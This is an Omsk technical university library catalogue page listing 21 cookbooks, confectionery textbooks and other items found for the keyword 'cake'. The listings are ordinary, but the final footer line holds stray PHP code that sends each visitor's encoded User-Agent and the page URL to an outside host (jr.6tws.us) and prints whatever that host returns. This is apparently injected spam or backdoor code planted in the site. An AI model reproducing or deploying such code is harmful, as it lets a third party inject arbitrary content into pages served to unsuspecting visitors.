Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

93 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=КЕКС")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 21
1. 
Кулинарные рецепты [Текст] / сост. Л. И. Воробьева, 1983. - 835 с.
Ключевые слова 
БУТЕРБРОД -- САЛАТ -- ВИНЕГРЕТ -- ЗАКУСКА ХОЛОДНАЯ -- ЗАКУСКА ОВОЩНАЯ -- ЗАКУСКА ИЗ ЯИЦ -- СОУС -- ЗАКУСКА ГОРЯЧАЯ -- БУЛЬОН -- СУП -- СУП - ПЮРЕ -- СУП ХОЛОДНЫЙ -- МЯСО ОТВАРНОЕ -- МЯСО ТУШЕНОЕ -- МЯСО ЖАРЕНОЕ -- МЯСО РУБЛЕНОЕ -- МЯСО ЗАПЕЧЕННОЕ -- РЫБА ОТВАРНАЯ -- РЫБА ЖАРЕНАЯ -- РЫБА ТУШЕНАЯ -- БЛЮДА ИЗ МОРЕПРОДУКТОВ -- БЛЮДА МОЛОЧНЫЕ -- БЛЮДА ИЗ ЯИЦ -- ОМЛЕТ -- ОВОЩИ ОТВАРНЫЕ -- ОВОЩИ ЖАРЕНЫЕ -- ОВОЩИ ЗАПЕЧЕННЫЕ -- ОВОЩИ ТУШЕНЫЕ -- ОВОЩИ ФАРШИРОВАННЫЕ -- БЛЮДА ИЗ ГРИБОВ -- КАША -- ПЛОВ -- БЛЮДА ИЗ МАКАРОННЫХ ИЗДЕЛИЙ -- БЛЮДА ИЗ БОБОВЫХ -- ТЕСТО ДРОЖЖЕВОЕ -- ТЕСТО ПРЕСНОЕ -- ТЕСТО СЛОЕНОЕ -- БЛИНЫ -- ОЛАДЬИ -- БУЛОЧКИ -- КУЛИЧИ -- ПЕЧЕНЬЕ -- ПИРОЖНЫЕ -- ТОРТ -- КЕКС -- КИСЕЛЬ -- КОМПОТ -- ЖЕЛЕ -- КРЕМ -- ПУДИНГ -- КОНСЕРВИРОВАНИЕ ДОМАШНЕЕ -- МАРИНАД -- ЗАМОРАЖИВАНИЕ ОВОЩЕЙ -- ЗАМОРАЖИВАНИЕ ПЛОДОВ
Держатели документа (Информация об экземплярах) 
2. 
Микроволновая кухня каждый день [Текст] / сост. Ю. Р. Васильев ; дар. И. Ю. Морозов, 1995. - 383 с.
Держатели документа (Информация об экземплярах) 
3. 
Сборник рецептур мучных кондитерских и булочных изделий [Текст] / сост. А. В. Павлов, 1998. - 294 с.
Держатели документа (Информация об экземплярах) 
4. 
Сборник рецептур мучных кондитерских и булочных изделий [Текст] / сост. А. В. Павлов, 2014. - 294 с.
Держатели документа (Информация об экземплярах) 
5. 
Кулинарные рецепты: Из "Книги о вкусной и здоровой пище" [Текст] / сост. Л. И. Воробьева ; дар.: Л. К. Жарина, Л. К. Жарина, 1988. - 334, [1] с.
Ключевые слова 
ЗАКУСКА -- БУТЕРБРОД -- САЛАТ -- ИКРА -- ПАШТЕТ -- СОУС -- МАЙОНЕЗ -- БУЛЬОН -- СУП -- ОКРОШКА -- МЯСО -- КОТЛЕТА -- ТЕФТЕЛИ -- ШНИЦЕЛЬ -- ПЕЛЬМЕНИ -- КУРИЦА -- ДИЧЬ -- РЫБА -- МОРЕПРОДУКТ -- ТВОРОЖНИКИ -- ВАРЕНИК -- БЛИНЧИКИ -- ЗАПЕКАНКА -- ПУДИНГ -- ОМЛЕТ -- ОВОЩИ -- ГРИБЫ -- КАРТОФЕЛЬ -- ФОРШМАК -- КАША -- ПЛОВ -- КЛЕЦКИ -- ЧЕБУРЕК -- КУКУРУЗА -- ФАСОЛЬ -- ГОРОХ -- ЧЕЧЕВИЦА -- ПИРОЖОК -- ВАТРУШКА -- БУЛКА -- ОЛАДЬИ -- РУЛЕТ -- ПИРОЖНОЕ -- ТОРТ -- КЕКС -- ПОНЧИК -- ХВОРОСТ -- КИСЕЛЬ -- КОМПОТ -- ЖЕЛЕ -- МУСС -- КРЕМ -- ПУДИНГ -- ШАРЛОТКА -- МАРИНАД -- СОЛЕНЬЕ -- МАРИНАД -- КОНСЕРВИРОВАНИЕ -- ЗАМОРАЖИВАНИЕ -- ЯГОДЫ
Держатели документа (Информация об экземплярах) 
6. 
Кузнецова, Людмила Семеновна. Технология и организация производства кондитерских изделий [Текст] / Л. С. Кузнецова, М. Ю. Сиданова, 2009. - 478, [1] с.
Держатели документа (Информация об экземплярах) 

Рассмотрена технология переработки пищевого сырья в сахарные и мучные кондитерские изделия. Приведены требования к качеству сырья при его закупке, хранении и подготовке к первичной переработке, химический состав и свойства сырья и сведения о его подверженности изменениям под влиянием теплового, механического и других видов воздействия. Изложены методика составления рецептур кондитерских изделий и требования к качеству готовой продукции и ее хранению.

Во 2-е издание внесены исправления и дополнения, связанные с введением в действие новых ГОСТов на пищевые продукты по состоянию на 1 января 2009 г.

Для студентов средних профессиональных учебных заведений. Может быть полезен студентам вузов и специалистам кондитерского производства.

7. 
Крестьянка. - Журнал, 2010г. № 3
Оглавление 
  • Симонова, Даша. [Письма читателей] / Д. Симонова, И. Дьячов, Л. Талышкина. - с.6
  • [Фотоконкурс]. - с.8-9
  • Иванова, Анастасия. Слишком молода, чтобы стареть / А. Иванова. - с.11
  • Прокофьева, Елена. [Книги] / Е. Прокофьева. - с.16
  • Прокофьева, Елена. Кино / Е. Прокофьева. - с.17, 19
  • Литвинова, Рената. Уметь делиться - это важно / Р. Литвинова. - с.20
  • Цаплин, Алексей. Юридический практикум / А. Цаплин. - с.22
  • Гусева, Екатерина. Просто красавица / Е. Гусева. - с.24-29
  • Санжарова, Оксана. Мартеницы / О. Санжарова. - с.30-31
  • Санжарова, Оксана. День мимозы / О. Санжарова. - с.32-33
  • Прокофьева, Елена. Дворец колдуна / Е. Прокофьева. - с.34-37
  • Сельский модерн. - с.38-41
  • Цветочное чаепитие. - с.42-45
  • Герасимова, Дарья. Волшебное зеркало / Д. Герасимова. - с.46-47
  • 5 домашних птиц. - с.48
  • Тельнова, Ульяна. Игра в свежие шахматы / У. Тельнова. - с.50-51
  • Весеннее настроение. - с.52-53
  • Сомова, Полина. Фондю / П. Сомова. - с.54-55
  • Цыбульская, Ольга. Постные мифы / О. Цыбульская. - с.56-57
  • Бугайский, Андрей. Кекс / А. Бугайский. - с.58-59
  • Копытова, Нина. Жюльен / Н. Копытова. - с.60
  • Миронова, Ирина. Со сто первого взгляда / И. Миронова. - с.62-63
  • Дементьев, Дмитрий. Психологический практикум / Д. Дементьев. - с.64
  • Миронова, Ирина. Человек на букву "М" / И. Миронова. - с.66-68
  • Гаврилова, Ольга. Психологический практикум / О. Гаврилова. - с.69
  • Барац, Леонид. Леонид Барац. Молчание - золото / Л. Барац. - с.70-71
  • Калинина-Артемова, Анна. Всегда взаимная любовь / А. Калинина-Артемова. - с.72-73
  • Кулик, Лина. Игорь Крутой. Песни про любовь / Л. Кулик. - с.74-75
  • Жук, Ядвига. Платяной шкаф / Я. Жук. - с.76-77
  • Санжарова, Оксана. Наряд из платков / О. Санжарова. - с.78
  • Цыбульская, Ольга. Синдром хрупкости / О. Цыбульская. - с.80-82
  • Савельева, Лариса Викторовна. Худеем на здоровье / Л. В. Савельева. - с.83
  • Богданкевич, Мария. Вернемся к телу / М. Богданкевич. - с.84-85
  • Егупова, Карина. Ручная работа / К. Егупова. - с.86-87
  • 3 вопроса на тему.... - с.88
  • Костомарова, Ирина. Терем - теремок / И. Костомарова. - с.92-95
  • Боярская, Виктория. Летят скворцы / В. Боярская. - с.96-98
  • Изотов, Степан. Кислородный ковер / С. Изотов. - с.100-101
  • аль-Шимари, Елена. Дамы с камелиями / Е. аль-Шимари. - с.102-103
  • аль-Шимари, Елена. Чеширский кот / Е. аль-Шимари. - с.104-105
  • аль-Шимари, Елена. Первый цвет / Е. аль-Шимари. - с.106-108
  • Паромова, Ирина. Мышкин / И. Паромова. - с.109
Держатели документа (Информация об экземплярах) 
8. 
Табаторович, Александр Николаевич. Товароведение и экспертиза качества мучных кондитерских изделий [Текст] / А. Н. Табаторович, О. Д. Худякова ; дар. О. Д. Худякова, 2016. - 140 с.
Держатели документа (Информация об экземплярах) 

В учебном пособии рассмотрены вопросы терминологии, классификации, пищевой ценности, формирования и оценки качества основных видов и разновидностей мучных кондитерских изделий. Классификация ассортимента, показатели качества и безопасности представлены в соответствии с действующими нормативными документами и Техническими регламентами Таможенного союза.

Пособие предназначено для студентов высших учебных заведений, обучающихся по направлению подготовки 38.03.06 "Торговое дело", профиль Товароведение и экспертиза товаров, при изучении раздела "Кондитерские товары" в рамках дисциплины "Товароведение и экспертиза зерномучных и кондитерских товаров". Может быть полезно для товароведов-экспертов, коммерсантов и других практических работников, чья деятельность связана с производством, продажей и хранением мучных кондитерских изделий.

9. 
Десерты и напитки [Текст] / сост. Е. В. Шиш ; дар. В. А. Козлова, 1995. - 490, [1] с.
Держатели документа (Информация об экземплярах) 
10. 
Сладкий сюрприз [Текст], 1998. - 333 с. [10] вкл. цв. л. с.
Держатели документа (Информация об экземплярах) 
11. 
Пашук З. Н. Мучные кондитерские изделия [Текст] / З. Н. Пашук, Т. К. Апет, 1997. - 459 с.
Ключевые слова 
ИЗДЕЛИЯ КОНДИТЕРСКИЕ -- ПРОИЗВОДСТВО КОНДИТЕРСКОЕ -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ МУЧНЫЕ -- МУКА -- КРАХМАЛ -- САХАР -- МЕД -- ПАТОКА -- ЯЙЦА -- МОЛОКО -- МАСЛО -- МАРГАРИН -- ЖИР -- ФРУКТЫ -- ЯГОДЫ -- РАЗРЫХЛИТЕЛЬ ТЕСТА -- ДОБАВКА АРОМАТИЧЕСКАЯ -- ДОБАВКА ВКУСОВАЯ -- ОРЕХИ -- МАК -- ПЕЧЕНЬЕ САХАРНОЕ -- ПЕЧЕНЬЕ ЗАТЯЖНОЕ -- ПЕЧЕНЬЕ СДОБНОЕ -- ГАЛЕТЫ -- КРЕКЕР -- ВЫПЕЧКА ПЕЧЕНЬЯ -- ПРЯНИК -- КЕКС -- БАБА РОМОВАЯ -- ТОРТ -- СИРОП -- ПОМАДА -- КАРАМЕЛЬ -- КАНДИР ДЛЯ САХАРНЫХ ФИГУР -- КРЕМ -- МАРЦИПАН -- ПРЕДПРИЯТИЕ ОБЩЕСТВЕННОГО ПИТАНИЯ - ТРЕБОВАНИЯ САНИТАРНЫЕ -- ПРАВИЛА ЛИЧНОЙ ГИГИЕНЫ -- СРЕДСТВА МОЮЩИЕ -- СРЕДСТВА ДЕЗИНФИЦИРУЮЩИЕ -- ОСМОТР МЕДИЦИНСКИЙ ЕЖЕСМЕННЫЙ -- ЛАМПА БАКТЕРИЦИДНАЯ
Держатели документа (Информация об экземплярах) 
12. 
Мазепа Е. В. Практикум для кондитера [Текст] : Учеб. пособие / Е. В. Мазепа, 2002. - 372,[2] с.
Держатели документа (Информация об экземплярах) 
13. 
Справочник по товароведению продовольственных товаров [Текст] : Справочники/словари / Под ред. Т.Г.Родиной, 2003. - 608 с.
Ключевые слова 
ТОВАРОВЕДЕНИЕ -- Товары продовольственные -- ЦЕННОСТЬ ПИЩИ ЭНЕРГЕТИЧЕСКАЯ -- ЦЕННОСТЬ ПИЩИ биологическая -- ЦЕННОСТЬ ПИЩИ физиологическая -- ЦЕННОСТЬ ПИЩИ органолептическая -- Усвояемость пищи -- КОДИРОВАНИЕ ТОВАРА -- МАРКИРОВКА ТОВАРА -- ИНФОРМАЦИЯ О ТОВАРЕ -- БЕЗОПАСНОСТЬ пищевых продуктов -- Безопасность эпидемиологическая -- ТАРА -- УПАКОВКА -- УТИЛИЗАЦИЯ тары -- ДОБАВКА ПИЩЕВАЯ -- Краситель пищевой -- Консервант -- Антиокислитель -- Ароматизатор -- Препарат коптильный -- ТОВАРЫ зерномучные -- Зерно -- Мука -- Крупа -- МАКАРОНЫ -- Хлеб -- СУХАРИ -- ПЛОДЫ -- ОВОЩИ -- ГРИБЫ -- КРАХМАЛ -- САХАР -- МЕД -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ -- РЕЗИНКА ЖЕВАТЕЛЬНАЯ -- Карамель -- Шоколад -- КАКАО - порошок -- Конфеты -- Ирис -- Драже -- Халва -- Печенье -- ВАФЛИ -- ПИРОЖНЫЕ -- ТОРТЫ -- РУЛЕТ -- КЕКС -- Сладости восточные -- КОНЦЕНТРАТ ПИЩЕВОЙ -- ПРОДУКТЫ детского питания -- ТОВАРЫ вкусовые -- ЖИР ПИЩЕВОЙ -- МОЛОКО -- Сметана -- Сыр -- ТОВАРЫ молочные -- ЯЙЦЕПРОДУКТЫ -- МЯСО -- КОНСЕРВЫ МЯСНЫЕ -- РЫБА -- КОНСЕРВЫ РЫБНЫЕ -- ПРЕСЕРВЫ РЫБНЫЕ
Держатели документа (Информация об экземплярах) 
14. 
Донцова, Дарья Аркадьевна. Кекс в большом городе [Текст] : роман / Дарья Донцова, 2005. - 372, [9] с.
Ключевые слова 
Оглавление 
  • Советы от безумной оптимистки Дарьи Донцовой
Держатели документа (Информация об экземплярах) 
15. 
Сидорина Е. И. Современная кухня [Текст] : кулинар. рецепты из доступ. продуктов / Е. И. Сидорина, 1993. - 543 с.
Ключевые слова 
СЕРВИРОВКА СТОЛА -- ЗАКУСКА ХОЛОДНАЯ -- САЛАТ -- ВИНЕГРЕТ -- ПАШТЕТ -- ЗАЛИВНОЕ -- БУТЕРБРОД -- БЛЮДА МЯСНЫЕ -- БЛЮДА ИЗ РЫБЫ -- СЫР -- БЛЮДА ИЗ ЯИЦ -- СУП -- БОРЩ -- ЩИ -- РАССОЛЬНИК -- СУП ОВОЩНОЙ -- УХА -- СУП МОЛОЧНЫЙ -- СУП ГРИБНОЙ -- БЛИНЫ -- ОЛАДЬИ -- БЛЮДА ИЗ ГРИБОВ -- БЛЮДА ИЗ КРУП -- БЛЮДА ИЗ БОБОВЫХ -- ЗАПЕКАНКА -- ПЛОВ -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА ИЗ КАРТОФЕЛЯ -- СОУС -- ТЕСТО ДРОЖЖЕВОЕ -- ТЕСТО СЛОЕНОЕ -- ТОРТЫ -- ТЕСТО БИСКВИТНОЕ -- ПЕЧЕНЬЕ -- ХВОРОСТ -- ВАФЛИ -- КЕКС -- ПИРОГ -- КРЕМ МАСЛЯНЫЙ -- КРЕМ БЕЛКОВЫЙ -- КРЕМ ЗАВАРНОЙ -- МУСС -- ЖЕЛЕ -- КОМПОТ -- КИСЕЛЬ -- БЛЮДА СЛАДКИЕ -- ЗАГОТОВКИ -- КАПУСТА КВАШЕНАЯ -- КОНСЕРВИРОВАНИЕ -- МАРИНОВАНИЕ -- ВАРЕНЬЕ -- ДЖЕМ -- ЦУКАТЫ
16. 
Сборник рецептур мучных кондитерских и булочных изделий [Текст] : Для предприятий общественного питания / Сост. А. В. Павлов, 2001. - 294 с.
Держатели документа (Информация об экземплярах) 
17. 
Люка А. П. Европейская кухня [Текст] : издания для досуга / А. П. Люка, 2004. - 174 с.
Держатели документа (Информация об экземплярах) 
18. 
Уоррен Дж. Шотландская кухня [Текст] / Дж. Уоррен ; авт. предисл. В. В. Похлёбкин, 1983. - 73 с.
Держатели документа (Информация об экземплярах) 
19. 
Романова Т. В. Приятного аппетита! [Текст] / Т. В. Романова, 1990. - 200 с. [8] вкл. цв. л. с.
Ключевые слова 
КУЛИНАРИЯ ДОМАШНЯЯ -- ПИТАНИЕ РАЦИОНАЛЬНОЕ -- СЕРВИРОВКА СТОЛА -- БЛЮДА ХОЛОДНЫЕ -- ЗАКУСКА -- БУТЕРБРОД -- САЛАТ -- ВИНЕГРЕТ -- СУПЫ -- ЩИ -- БОРЩ -- РАССОЛЬНИК -- СУП - ПЮРЕ -- СУП МОЛОЧНЫЙ -- БЛЮДА РЫБНЫЕ -- БЛЮДА МЯСНЫЕ -- СОУС -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА ИЗ КРУП -- БЛЮДА МУЧНЫЕ -- БЛЮДА СЛАДКИЕ -- КОМПОТ -- КИСЕЛЬ -- ЖЕЛЕ -- МУСС -- КРЕМ -- КАША ГУРЬЕВСКАЯ -- НАПИТКИ -- ТЕСТО ДРОЖЖЕВОЕ -- ПИРОГ -- ТЕСТО СЛОЕНОЕ -- МАННИК -- КЕКС -- ХВОРОСТ -- ПЕЧЕНЬЕ -- ПИРОЖНЫЕ -- ТОРТ -- ФРУКТЫ -- ОВОЩИ -- КУХНЯ ОМСКАЯ -- ЗЕЛЬЦ -- СТУДЕНЬ -- СТЕРЛЯДЬ -- ЩУКА -- ВЕРЕЩАКА -- ПЕЛЬМЕНИ -- ПАСХА
Держатели документа (Информация об экземплярах) 
20. 
Шестакова Т. И. Кондитер-профессионал [Текст] : учеб. пособие / Т. И. Шестакова, 2006. - 399 с.
Ключевые слова 
МУКА ПШЕНИЧНАЯ -- МУКА СОЕВАЯ -- МУКА кукурузная -- КРАХМАЛ -- глюкоза -- фруктоза -- ПОДСЛАСТИТЕЛЬ -- патока крахмальная -- МЕД -- МОЛОКО -- ПРОДУКТЫ МОЛОЧНЫЕ -- МАСЛО СЛИВОЧНОЕ -- ЖИРЫ -- ЯЙЦА -- ЯЙЦЕПРОДУКТЫ -- ПРОДУКТЫ ВКУСОВЫЕ -- КИСЛОТА ПИЩЕВАЯ -- ВЕЩЕСТВА АРОМАТИЧЕСКИЕ -- РАЗРЫХЛИТЕЛЬ -- ФРУКТЫ -- ЦУКАТЫ -- КРУПА -- ОРЕХИ -- МАК -- УЛУЧШИТЕЛЬ хлебобулочных изделий -- ДОБАВКА БИОЛОГИЧЕСКИ АКТИВНА -- СЛИВКИ -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ -- ФАРШ -- ТЕСТО дрожжевое -- КУЛИЧИ -- БАБА РОМОВАЯ -- ТЕСТО бездрожжевое -- ВАТРУШКА -- ТЕСТО ПРЯНИЧНОЕ -- ТЕСТО ПЕСОЧНОЕ -- БИСКВИТ -- ТЕСТО ЗАВАРНОЕ -- ТЕСТО СЛОЕНОЕ -- волованы -- ФРИТЮР -- ПЕЧЕНЬЕ -- КЕКС -- ПИЦЦА -- СЛАДОСТИ ВОСТОЧНЫЕ -- СИРОП -- помадка -- ГЛАЗУРИ -- мастика -- КАРАМЕЛЬ -- кандир для сахарных фигур -- грильяж -- ЖЕЛЕ -- марципан -- ШОКОЛАД -- посыпки -- КРЕМ -- ПИРОЖНЫЕ -- ТОРТЫ
Держатели документа (Информация об экземплярах) 
21. 
Кенгис, Роберт Петрович. Изделия из теста [Текст] / Р. П. Кенгис, 1958. - 192 с.
Держатели документа (Информация об экземплярах) 


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 2995 - 22.08.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.98 с.14 запросов, 0.51c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;